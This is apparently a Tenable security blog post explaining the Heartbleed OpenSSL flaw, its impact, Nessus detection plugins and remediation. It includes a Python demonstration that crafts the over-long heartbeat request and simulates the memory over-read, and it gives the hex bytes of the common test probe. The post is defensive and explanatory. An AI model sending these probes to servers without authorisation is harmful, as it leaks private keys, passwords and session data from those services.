
Beware of Bleeding Hearts (Updated)

Note: Passive Vulnerability Scanner (PVS) is now Nessus Network Monitor. To learn more about this application and its latest capabilities, visit the Nessus Network Monitor web page.

A recently disclosed vulnerability, tracked as CVE-2014-0160 in the Common Vulnerabilities and Exposures (CVE) list but more commonly known as Heartbleed, has been acknowledged by the OpenSSL project and by NCSC-FI (the Finnish national CERT). It is a flaw in OpenSSL's implementation of the TLS/DTLS heartbeat extension (RFC 6520): a peer sends a heartbeat request whose declared payload length is larger than the payload it actually sent, and the vulnerable side echoes back that many bytes from its own memory. When exploited, it leaks memory contents of the vulnerable peer to the other end of the connection, from server to client or from client to server.

This vulnerability is particularly serious because it is invisible to administrators: an exploitation attempt looks like an ordinary heartbeat exchange and leaves no trace in application logs. Each malicious heartbeat returns up to 64 kilobytes of the vulnerable process's memory (the payload length field is 16 bits wide). The attacker does not get to choose which 64 KB they receive, only memory adjacent to the heartbeat buffer on the heap comes back, but nothing stops them from repeating the request thousands of times and accumulating whatever the process has recently held. The attacker can send the requests directly to a vulnerable service, or run a malicious server and attack any vulnerable client that connects to it.
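The exchange described above, as an added illustration that is not part of the original post and not OpenSSL code: a Python model that builds the over-long heartbeat request a probing client sends, runs it through a toy "server" whose read buffer is followed by constructed heap contents (a fake private-key fragment stands in for whatever a real process holds), and shows the vulnerable handling beside the bounds check OpenSSL 1.0.1g added. The server class, its memory layout and the secret are assumptions for the demo.

```python
"""Heartbleed (CVE-2014-0160) in miniature: build the malformed heartbeat
record a probing client sends, then run it through a simulated server-side
handler in its vulnerable and patched forms.  Added illustration; the
"server" is a toy model of process memory, not OpenSSL code."""
import struct

# TLS heartbeat message (RFC 6520): type(1) | payload_length(2) | payload | padding(>=16)
HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
MIN_PADDING = 16
TLS_HEARTBEAT_CONTENT_TYPE = 0x18


def build_heartbeat(claimed_length, actual_payload=b"", padding=MIN_PADDING):
    """Heartbeat request body.  A probe lies: claimed_length > len(actual_payload)."""
    return (struct.pack("!BH", HEARTBEAT_REQUEST, claimed_length)
            + actual_payload + b"\x00" * padding)


def tls_record(body, version=(3, 2)):
    """Wrap a heartbeat body in a TLS record header (type 0x18, version, length)."""
    return struct.pack("!BBBH", TLS_HEARTBEAT_CONTENT_TYPE,
                       version[0], version[1], len(body)) + body


class SimulatedServer:
    """Toy model of the vulnerable process: the incoming record lands in a
    read buffer that is immediately followed by other heap contents."""

    def __init__(self, heap_after_record):
        # Constructed "adjacent memory" for the demo; in a real process this is
        # whatever was recently allocated or freed nearby (keys, cookies, passwords).
        self.heap_after_record = heap_after_record

    def vulnerable_handle(self, record):
        """OpenSSL 1.0.1 through 1.0.1f: trusts the length field inside the
        message and copies that many bytes starting at the payload pointer."""
        _hbtype, payload_len = struct.unpack("!BH", record[:3])
        memory = record + self.heap_after_record      # the record, then the heap beyond it
        echoed = memory[3:3 + payload_len]            # over-reads past the record
        return (struct.pack("!BH", HEARTBEAT_RESPONSE, payload_len)
                + echoed + b"\x00" * MIN_PADDING)

    def patched_handle(self, record):
        """OpenSSL 1.0.1g: check the declared length against the record length
        actually received and silently drop anything that does not fit."""
        if 1 + 2 + MIN_PADDING > len(record):
            return None
        _hbtype, payload_len = struct.unpack("!BH", record[:3])
        if 1 + 2 + payload_len + MIN_PADDING > len(record):
            return None
        return (struct.pack("!BH", HEARTBEAT_RESPONSE, payload_len)
                + record[3:3 + payload_len] + b"\x00" * MIN_PADDING)


def extract_leak(response, sent_payload):
    """Client side: response payload bytes beyond what we sent are leaked memory."""
    hbtype, payload_len = struct.unpack("!BH", response[:3])
    if hbtype != HEARTBEAT_RESPONSE:
        raise ValueError("not a heartbeat response")
    return response[3:3 + payload_len][len(sent_payload):]


def is_vulnerable(response, sent_payload):
    """A remote checker's verdict: any extra bytes echoed back mean the peer leaks memory."""
    return response is not None and len(extract_leak(response, sent_payload)) > 0


if __name__ == "__main__":
    # Constructed secret sitting just past the read buffer.
    secret = b"-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEA" + b"A" * 200
    server = SimulatedServer(heap_after_record=secret)
    probe = build_heartbeat(claimed_length=64, actual_payload=b"\x00")
    print("probe on the wire:", tls_record(probe).hex())
    leaked = extract_leak(server.vulnerable_handle(probe), b"\x00")
    print("vulnerable server leaked:", leaked)
    print("patched server replied:", server.patched_handle(probe))
```

The three-byte body `01 40 00` (type 1, claimed length 16384, no payload) wrapped as `18 03 02 00 03 01 40 00` is the shape of the widely circulated test probe; against a vulnerable peer it returns 16 KB of memory, against a patched one nothing at all, which is exactly the distinction the test helper `is_vulnerable` makes.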

Codenomicon, one of the discoverers (the company behind the Defensics fuzzing tool), posted in an FAQ that, when testing against their own services, they were able to obtain "secret keys used for our X.509 certificates, user names and passwords, instant messages, emails and business critical documents and communication."

The bug was introduced into the OpenSSL source in December 2011 and has shipped in every release since OpenSSL 1.0.1 on 14 March 2012. OpenSSL 1.0.1g, released on 7 April 2014, fixes it; the older 0.9.8 and 1.0.0 branches never contained the heartbeat code and are not affected.

Unlike the recent "goto fail" certificate-validation bug in Apple's OS X and iOS, and the similar one in GnuTLS, this is not a man-in-the-middle vulnerability: the attacker does not need to sit on the path between client and server. However, once a server's private key has been extracted with this attack, the attacker can impersonate that server and mount a man-in-the-middle attack, and can decrypt any recorded past traffic that was not protected by a forward-secret cipher suite.

There are several websites devoted to detailed analysis, such as https://heartbleed.com, and to testing servers for the vulnerability, such as http://filippo.io/Heartbleed/, while security vendors are working hard to set up honeypots and tools to detect exploitation attempts.

Tenable released such detection on 8 April: http://www.tenable.com/plugins/index.php?view=single&id=73412. This Nessus plugin is an active remote check: it sends a heartbeat request to the service and reports it vulnerable if extra memory comes back. It can test HTTPS (and anything speaking TLS directly, really) as well as STARTTLS-capable services such as IMAP, LDAP, NNTP, POP, SMTP, XMPP and more. Tenable also released a plugin for its Passive Vulnerability Scanner (PVS): http://www.tenable.com/8194.html. That plugin checks whether a remote web server is running an instance of OpenSSL that may be affected by this information disclosure vulnerability, and it does so by sniffing the network rather than probing the host. Alongside the remote check, Nessus has local patch-checking plugins for just about every Linux distribution; these confirm from the installed package whether the fix is present, safely and accurately, which matters because distributions often backport the fix while keeping an older version number in the banner.

The fix is to update OpenSSL to 1.0.1g (or to your distribution's patched package, which may carry an older version number with the fix backported) and then restart every service that loaded the old library, since a running process keeps using the vulnerable code until it is restarted. Because the attack leaves no trace in logs, you cannot rule out that your keys were leaked; once patched, treat the private key as compromised: generate a new key, reissue the certificate, and revoke the old one. This is the safest way to ensure your certificates remain trusted. Passwords and session cookies that passed through the vulnerable service should be considered exposed as well and changed after the patch is in place.
